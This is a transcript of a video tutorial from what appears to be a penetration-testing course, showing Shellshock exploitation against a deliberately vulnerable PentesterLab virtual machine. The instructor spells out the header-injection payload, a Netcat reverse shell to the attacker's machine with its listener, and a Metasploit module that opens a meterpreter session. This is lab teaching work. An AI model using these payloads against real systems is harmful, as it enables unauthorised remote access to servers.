[00:00:00] Instructor: Welcome back. It is time that we cover our first vulnerability in a website. And as a first vulnerability, I've chosen to show you the Shellshock exploitation. Now, Shellshock is an older vulnerability. It was discovered in 2014 and you will most likely never find it today while performing penetration tests. But nonetheless, I want to show it to you just because of the impact that it had. Shellshock is considered one of the most critical and serious vulnerabilities ever discovered. This vulnerability occurred due to bash differently processing environmental variables. With this, many things were hit, from DHCP clients, to terminal command lines, to CGI scripts inside of web applications. And in this tutorial we will see an example of exploiting ShellShock through the CGI script on a webpage. Also for this, we are going to download a small ISO file that will allow us to run a virtual machine only for this vulnerability.

[00:01:07] Don't worry, it'll only take a few seconds to install due to it being a small virtual machine, and it is purposely designed only for this specific vulnerability. To download it, you want to go to your Google, you can type in pentesterlab shellshock, and you should see a link like this that says CVE-2014-6271 called ShellShock. It'll be from pentesterlab.com, and you want to click on it, and it'll navigate you to this page right here where you will have the ShellShock introduction, fingerprinting and all the other stuff regarding this vulnerability. However, we're not going to go into these details right here because we want to exploit it ourselves. What we want to do is go to the Files right here, and you should see this ISO, where you want to click on it and it'll download the ISO image with a size of 19.1 megabytes, so you can see it is really, really small. Once you do that, you want to go to your VirtualBox and create a virtual machine as we usually do.

[00:02:13] Now, I already got shellshocklab created with the ISO file that we just downloaded, but what you essentially want to do is click on New, then you can call it anything you want. You can call it shellshock. You can select right here Linux as the operating system, and the version of Linux is going to be Other Linux 32 bit. Click on that. Then you can proceed to Next. You can leave it at 256 megabytes of RAM. That is more than enough for this machine. Click on Next right here. We want to create a virtual machine. Next here. Next here as well. And we can click on Create. And as usual, there are two more things that we want to do once we create a new virtual machine. We want to navigate to the Settings. From the Settings, we want to go to Network, switch from NAT to Bridged Adapter. Select your adapter right here. And another thing that we want to do is add our ISO file. So delete this Empty right here, click on the disc icon, click on Add, and find the ISO file.

[00:03:18] In my case, here it is, CVE-2014-6271. Click on Choose and click on OK. This will create your ShellShock virtual machine. After you do that, you want to go to your Kali Linux, start your Burp Suite tool that we covered already, that we covered the configuration of, and you want to go start it up. And after you start it up, you can open your Firefox. Now you might have noticed, if you tried before watching this video, that once you try to visit a page in Firefox without having Burp Suite running, you will not be able to visit any page. And that is because we set our Burp Suite to be a proxy for our Firefox. So now every time you want to visit a Firefox page or any website page, you must have Burp Suite open. And you must also have the intercept turned off so it doesn't intercept any packets. Otherwise your page will just load forever. Now that we opened Firefox, let us open Burp Suite too. It is starting the project, and as soon as it opens up, we'll be able to visit our page on our ShellShock virtual machine.

[00:04:30] Okay, so now that Burp Suite opened, go to Target, then go to Proxy and turn off the intercept right here. So Intercept should be off. Once you do that, the next thing that we want to do is start our ShellShock virtual machine. If you're starting it for the first time, it should only take a few seconds to set everything up since it is a really, really small virtual machine. And once it opens up, it won't even prompt you for a login. There is no login available inside of this machine right here. It will just enter the command line, where we want to type ifconfig just to find out the IP address of this machine. And in this case, it is 192.168.1.10. So all we want to do is go to our Firefox and visit this page to see what we have. And this seems to be the entire page of this virtual machine. We get "this system is running", the time that it is running, currently for zero minutes because we just started it up, and we get the kernel of that virtual machine.

[00:05:37] Now if we take a look at our Burp Suite right now and we go to the Target, and we go to our IP address of the ShellShock virtual machine, we will see all the links that we requested while trying to open the webpage of our ShellShock virtual machine. We will see this slash directory. We will see this JavaScript file, and we will see this cgi-bin status directory. So we get a CGI script right here. If we go to the response of that request that we sent, and to do that you simply just select the request that you want to go to and click on Response right here, then we will see down here this output that looks a lot like the output of the command uname -a. For example, if you run the command uname -a inside of your terminal, it'll give you an output like this, which will tell you which version of Linux you are running and so on and so on. We get a similar output inside of our Burp Suite, as we can see right here. And in most cases, this output comes from the uname -i command and it is run by bash.

[00:06:49] And inside this request that we did, the User-Agent field that we got inside of the request is an environmental variable when processed inside of this CGI script. So what we can try is to inject the command in that field. However, it won't work that easily. We can't just inject, for example, the whoami command instead of this. It'll not give us any output back. You might be asking why? Well, because the ShellShock vulnerability is based on first specifying an empty function. And I know this might sound confusing, but just stick with me for a couple more minutes and I will explain how it works. The vulnerability itself was discovered when, inside of an environmental variable such as this User-Agent, empty function syntax was specified, and empty function syntax looks something like this. Let me show you inside the terminal. It is this set of characters. So open bracket, closed bracket, then space, open curly bracket, then space, two dots, dot and comma, and closed curly bracket, and at the end another dot and comma.

[00:08:03] And this right here is the syntax for an empty function. So any command that we want to run, before it, we must have this empty function syntax. Why? Well, when bash gets these characters in this order, or if bash gets this empty function with the variable, instead of blocking it, it'll accept it with the variable that comes after, and it runs it as a command on the server, and that is the entire vulnerability. All we have to do is to specify a command after the syntax and it should work. Now to do that, we must send this HTTP request right here to this cgi-bin script once again. And we must specify, instead of the user agent, the empty function syntax and then our command. So how can we do that? How can we send the request once again? Well, luckily Burp Suite allows us to edit our requests and send them as many times as we want. All we need to do is to select the request that we want to send again. So we select it right here. Then we right-click and Send to Repeater right here. Then you will see this Repeater part light up.

[00:09:16] We want to go there, and here we can edit our request before actually sending it. So we mentioned that we want to inject the command inside of the User-Agent field. Let us remove this. And let's type the syntax for the empty function first. So open and closed bracket, then empty space, open curly bracket, then space, two dots, comma and dot, closed curly bracket, and comma and dot at the end. Now what you can do after this is inject your command. And if you want to, you can test to see if it works with the ping command first. But I'm not going to test it with the ping command. I'm going to straight away try to establish a connection with our Kali Linux machine and get a reverse shell back. So what do we want to do right here to establish a connection with our Kali Linux machine? Well, we want to execute /bin/bash, and this will tell the target to execute the following command. If we specify dash c after, it'll tell our target that whatever we send after this will be our command, and we must specify it between single quotes.

[00:10:27] So for now, we have the empty function syntax, then /bin/bash -c, then open single quote and close single quote, and in between the quotes we type nc, which stands for Netcat, and we specify the IP address of our Kali Linux machine. So let's check it out right here: sudo ifconfig, test1234 is my password, and I will specify 192.168.1.9. So right here, 192.168.1.9. And I want to specify also the port to connect to. In my case I will use port 12345; it doesn't really matter. And at the end we want to specify -e, which stands for what we want to execute on our target machine. And we want to simply just use the bash shell. So we can do that by specifying slash bin and slash bash. And this is the entire command. I will copy it to my terminal so you can see it enlarged. So copy, and if I clear the screen, paste it right here. This is our entire command: the empty function syntax and then the function that allows us to establish a connection to our Kali Linux machine.

[00:11:44] But before we send this request from our Burp Suite, we must set up a listener right here. So I'm just going to go and type nc -lvp and then the port that we specified, which is 12345. Press Enter. This will listen for the incoming connections. And now that we changed the User-Agent field to our command, we can click on Send. If I go back to our Kali Linux terminal, we can see we got the connection from our ShellShock virtual machine. And if we try to execute commands such as whoami, all of that will work. We can see we are pentesterlab. The ls command will give me all of the directories inside of the current directory. I can type pwd to check out my current working directory, and I am in the /var/www/cgi-bin folder. Great. So we successfully exploited the ShellShock vulnerability and gained access to this machine. Now you can also automate this entire process with the Metasploit framework. So what we did right here is we manually exploited the target with the help of our Burp Suite.

[00:12:54] We sent our request for the cgi-bin script to the Repeater, then we changed the User-Agent field to our command, which requires the empty syntax at the beginning and after it the command that we want to execute, which can be any command that you really want. Then we set up a listener inside of our terminal and we sent this packet once again, or we sent this request once again. Right here we can see the response to this request, and it tells us that we got an internal server error because it doesn't really recognize this user agent. However, it did execute this command, which is all that we want. Inside of the Metasploit framework you can type search shellshock and you can use this exploit right here, which is exploit/multi/http/apache_mod_cgi_bash, environmental execution. You can copy that, type use and then paste the selection. It'll set our payload to be linux/x86/meterpreter/reverse_tcp, and if I type show options, I can set my options right here. So what I must set is the RHOSTS, which is the IP address of my target machine. Let's do that first.

[00:14:10] What I also must set is this RPATH. So this will be the path to the CGI script. So the RPATH must be set to cgi-bin/status. If I'm not mistaken, that is the path. Let us see inside of our Burp Suite. So it indeed is cgi-bin and then status. And all we're left to do right now is set this and run our exploit. So, oh, pardon me, it's not there. Let us just go and set the TARGETURI. It is TARGETURI that we must set to be /cgi-bin/status. So let's just set the TARGETURI instead. And let's set the RPATH back to slash bin, I believe. And let's give this a try. We send this, we get the meterpreter session one opened. And here it is, get user id will tell us who we are. We can execute the commands and we can do everything that we did inside of our exploitation section. So we successfully exploited the ShellShock vulnerability in two different ways: manually by using Burp Suite and sending our command in the User-Agent field, and with the help of this Metasploit framework module.

[00:15:31] It also exploited the User-Agent field, as we can see right here. We told the path to be /cgi-bin/status and we got the meterpreter reverse shell back. Great. Now that we did this, in the next video we're going to check out a very similar thing to this, which is called command injection. See you in the next video.